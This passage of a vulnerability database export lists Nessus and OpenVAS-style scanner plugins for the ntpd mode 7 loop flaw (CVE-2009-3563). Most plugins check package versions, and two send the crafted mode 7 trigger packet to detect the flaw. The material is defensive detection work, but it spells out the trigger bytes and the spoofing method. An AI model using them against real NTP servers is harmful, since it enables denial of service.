0x00, 0x00, 0x30, 0x00, 0x00, 0x00);\nsend(socket:soc, data:data);\nr = recv(socket:soc, length:8);\nclose(soc);\n\nif(!r)\n exit(0);\n\nif(hexstr(r) == \"9700000030000000\") {\n security_message(port:port, proto:\"udp\");\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "nessus": [{"lastseen": "2021-04-01T04:21:11", "description": "The version of ntpd running on the remote host has a denial of\nservice vulnerability. It responds to mode 7 error packets with its\nown mode 7 error packets. A remote attacker could exploit this by\nsending a mode 7 error response with a spoofed IP header, setting the\nsource and destination IP addresses to the IP address of the target. \nThis would cause ntpd to respond to itself endlessly, consuming\nexcessive amounts of CPU, resulting in a denial of service.", "edition": 25, "published": "2009-12-14T00:00:00", "title": "NTP ntpd Mode 7 Error Response Packet Loop Remote DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2021-04-02T00:00:00", "cpe": [], "id": "NTPD_MODE7_PING_PONG_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/43156", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(43156);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2009-3563\");\n script_bugtraq_id(37255);\n script_xref(name:\"CERT\", value:\"568372\");\n script_xref(name:\"Secunia\", value:\"37629\");\n\n script_name(english:\"NTP ntpd Mode 7 Error Response Packet Loop Remote DoS\");\n script_summary(english:\"Checks if the remote ntpd response to mode 7 error response\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote network time service has a denial of service\nvulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of ntpd running on the remote host has a denial of\nservice vulnerability. It responds to mode 7 error packets with its\nown mode 7 error packets. A remote attacker could exploit this by\nsending a mode 7 error response with a spoofed IP header, setting the\nsource and destination IP addresses to the IP address of the target. \nThis would cause ntpd to respond to itself endlessly, consuming\nexcessive amounts of CPU, resulting in a denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.ntp.org/show_bug.cgi?id=1331\"\n );\n # http://support.ntp.org/bin/view/Main/SecurityNotice#DoS_attack_from_certain_NTP_mode\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a07ed05\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to NTP 4.2.4p8 / 4.2.6 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\nscript_set_attribute(\n attribute:\"vuln_publication_date\",\n value:\"2009/11/04\" # first discussed on NTP bug tracker\n );\n script_set_attribute(\n attribute:\"patch_publication_date\",\n value:\"2009/12/08\"\n );\n script_set_attribute(\n attribute:\"plugin_publication_date\",\n value:\"2009/12/14\"\n );\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ntp_open.nasl\");\n script_require_keys(\"NTP/Running\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\n\n\nport = get_kb_item(\"Services/udp/ntp\");\nif (isnull(port)) port = 123;\n\nif (!get_udp_port_state(port))\n exit(0, 'UDP port '+port+' is not open.');\n\nif ( islocalhost() ) exit(0, \"This vulnerability can not be tested against localhost\");\n\nsoc = open_sock_udp(port);\nif (!soc) exit(1, \"Failed to open socket to UDP port \"+port+\".\");\n\nreq = raw_string(0x97, 0, 0, 0, 0x30, 0, 0, 0);\nsend(socket:soc, data:req);\nres = recv(socket:soc, length:8);\nclose(soc);\n\nif (isnull(res)) exit(1, \"The NTP server on UDP port \"+port+\" didn't respond.\");\n\n# The service is vulnerable if it responds to a mode 7 error response with a\n# mode 7 error response\nif (res == req)\n security_warning(port:port, proto:\"udp\");\nelse\n exit(1, 'Unexpected response from NTP server on UDP port '+port+'.');\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T15:44:49", "description": "Robin Park and Dmitri Vinokurov discovered a logic error in ntpd. A\nremote attacker could send a crafted NTP mode 7 packet with a spoofed\nIP address of an affected server and cause a denial of service via CPU\nand disk resource consumption.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2009-12-09T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : ntp vulnerability (USN-867-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2009-12-09T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:ntp-refclock", "p-cpe:/a:canonical:ubuntu_linux:ntp", "p-cpe:/a:canonical:ubuntu_linux:ntp-doc", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:9.10", "p-cpe:/a:canonical:ubuntu_linux:ntpdate", "p-cpe:/a:canonical:ubuntu_linux:ntp-server", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04", "p-cpe:/a:canonical:ubuntu_linux:ntp-simple", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-867-1.NASL", "href": "https://www.tenable.com/plugins/nessus/43087", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-867-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43087);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-3563\");\n script_bugtraq_id(37255);\n script_xref(name:\"USN\", value:\"867-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : ntp vulnerability (USN-867-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Robin Park and Dmitri Vinokurov discovered a logic error in ntpd. A\nremote attacker could send a crafted NTP mode 7 packet with a spoofed\nIP address of an affected server and cause a denial of service via CPU\nand disk resource consumption.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/867-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ntp-refclock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ntp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ntp-simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ntp\", pkgver:\"1:4.2.0a+stable-8.1ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ntp-doc\", pkgver:\"4.2.0a+stable-8.1ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ntp-refclock\", pkgver:\"4.2.0a+stable-8.1ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ntp-server\", pkgver:\"1:4.2.0a+stable-8.1ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ntp-simple\", pkgver:\"4.2.0a+stable-8.1ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"ntpdate\", pkgver:\"4.2.0a+stable-8.1ubuntu6.3\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"ntp\", pkgver:\"1:4.2.4p4+dfsg-3ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"ntp-doc\", pkgver:\"4.2.4p4+dfsg-3ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"ntpdate\", pkgver:\"4.2.4p4+dfsg-3ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ntp\", pkgver:\"1:4.2.4p4+dfsg-6ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ntp-doc\", pkgver:\"4.2.4p4+dfsg-6ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"ntpdate\", pkgver:\"4.2.4p4+dfsg-6ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"ntp\", pkgver:\"1:4.2.4p4+dfsg-7ubuntu5.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"ntp-doc\", pkgver:\"4.2.4p4+dfsg-7ubuntu5.2\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"ntpdate\", pkgver:\"4.2.4p4+dfsg-7ubuntu5.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"ntp\", pkgver:\"1:4.2.4p6+dfsg-1ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"ntp-doc\", pkgver:\"4.2.4p6+dfsg-1ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"ntpdate\", pkgver:\"4.2.4p6+dfsg-1ubuntu5.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-doc / ntp-refclock / ntp-server / ntp-simple / ntpdate\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:30", "description": "SunOS 5.10: xntpd patch.\nDate this patch was last updated by Sun : Apr/08/10", "edition": 21, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 127724-02", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:127724", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_127724-02.NASL", "href": "https://www.tenable.com/plugins/nessus/107463", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107463);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3563\");\n\n script_name(english:\"Solaris 10 (sparc) : 127724-02\");\n script_summary(english:\"Check for patch 127724-02\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 127724-02\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.10: xntpd patch.\nDate this patch was last updated by Sun : Apr/08/10\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/127724-02\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 127724-02\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:127724\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"127724-02\", obsoleted_by:\"148881-01 \", package:\"SUNWntpu\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWntpu\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:33", "description": "SunOS 5.10: SunFreeware ntp patch.\nDate this patch was last updated by Sun : Feb/26/10", "edition": 21, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 143725-01", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:143725", "p-cpe:/a:oracle:solaris:10:143727", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_143725-01.NASL", "href": "https://www.tenable.com/plugins/nessus/107549", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107549);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3563\");\n\n script_name(english:\"Solaris 10 (sparc) : 143725-01\");\n script_summary(english:\"Check for patch 143725-01\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 143725-01\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.10: SunFreeware ntp patch.\nDate this patch was last updated by Sun : Feb/26/10\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/143725-01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 143725-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:143725\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:143727\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"143725-01\", obsoleted_by:\"\", package:\"SUNWntp4u\", version:\"11.10.0,REV=2009.07.02.14.13\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWntp4u\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-06T09:17:56", "description": "'NTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control\nutility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while\nroutine NTP time transfers use modes 1 through 5. Upon receipt of an\nincorrect mode 7 request or a mode 7 error response from an address\nthat is not listed in a 'restrict ... noquery' or 'restrict ...\nignore' segment, ntpd will reply with a mode 7 error response and log\na message.'\n\n'If an attacker spoofs the source address of ntpd host A in a mode 7\nresponse packet sent to ntpd host B, both A and B will continuously\nsend each other error responses, for as long as those packets get\nthrough.'\n\n'If an attacker spoofs an address of ntpd host A in a mode 7\nresponse packet sent to ntpd host A, then host A will\nrespond to itself endlessly, consuming CPU and logging\nexcessively.'.", "edition": 24, "published": "2013-01-24T00:00:00", "title": "AIX 5.3 TL 9 : xntpd (IZ71093)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:ibm:aix:5.3"], "id": "AIX_IZ71093.NASL", "href": "https://www.tenable.com/plugins/nessus/63801", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xntpd_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63801);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-3563\");\n script_xref(name:\"CERT\", value:\"568372\");\n\n script_name(english:\"AIX 5.3 TL 9 : xntpd (IZ71093)\");\n script_summary(english:\"Check for APAR IZ71093\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"'NTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control\nutility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while\nroutine NTP time transfers use modes 1 through 5. Upon receipt of an\nincorrect mode 7 request or a mode 7 error response from an address\nthat is not listed in a 'restrict ... noquery' or 'restrict ...\nignore' segment, ntpd will reply with a mode 7 error response and log\na message.'\n\n'If an attacker spoofs the source address of ntpd host A in a mode 7\nresponse packet sent to ntpd host B, both A and B will continuously\nsend each other error responses, for as long as those packets get\nthrough.'\n\n'If an attacker spoofs an address of ntpd host A in a mode 7\nresponse packet sent to ntpd host A, then host A will\nrespond to itself endlessly, consuming CPU and logging\nexcessively.'.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xntpd_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"09\", patch:\"IZ71093_09\", package:\"bos.net.tcp.client\", minfilesetver:\"5.3.9.0\", maxfilesetver:\"5.3.9.7\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-06T09:17:56", "description": "'NTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control\nutility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while\nroutine NTP time transfers use modes 1 through 5. Upon receipt of an\nincorrect mode 7 request or a mode 7 error response from an address\nthat is not listed in a 'restrict ... noquery' or 'restrict ...\nignore' segment, ntpd will reply with a mode 7 error response and log\na message.'\n\n'If an attacker spoofs the source address of ntpd host A in a mode 7\nresponse packet sent to ntpd host B, both A and B will continuously\nsend each other error responses, for as long as those packets get\nthrough.'\n\n'If an attacker spoofs an address of ntpd host A in a mode 7\nresponse packet sent to ntpd host A, then host A will\nrespond to itself endlessly, consuming CPU and logging\nexcessively.'.", "edition": 24, "published": "2013-01-24T00:00:00", "title": "AIX 6.1 TL 4 : xntpd (IZ71071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "modified": "2013-01-24T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IZ71071.NASL", "href": "https://www.tenable.com/plugins/nessus/63800", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xntpd_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63800);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-3563\");\n script_xref(name:\"CERT\", value:\"568372\");\n\n script_name(english:\"AIX 6.1 TL 4 : xntpd (IZ71071)\");\n script_summary(english:\"Check for APAR IZ71071\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"'NTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control\nutility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while\nroutine NTP time transfers use modes 1 through 5. Upon receipt of an\nincorrect mode 7 request or a mode 7 error response from an address\nthat is not listed in a 'restrict ... noquery' or 'restrict ...\nignore' segment, ntpd will reply with a mode 7 error response and log\na message.'\n\n'If an attacker spoofs the source address of ntpd host A in a mode 7\nresponse packet sent to ntpd host B, both A and B will continuously\nsend each other error responses, for as long as 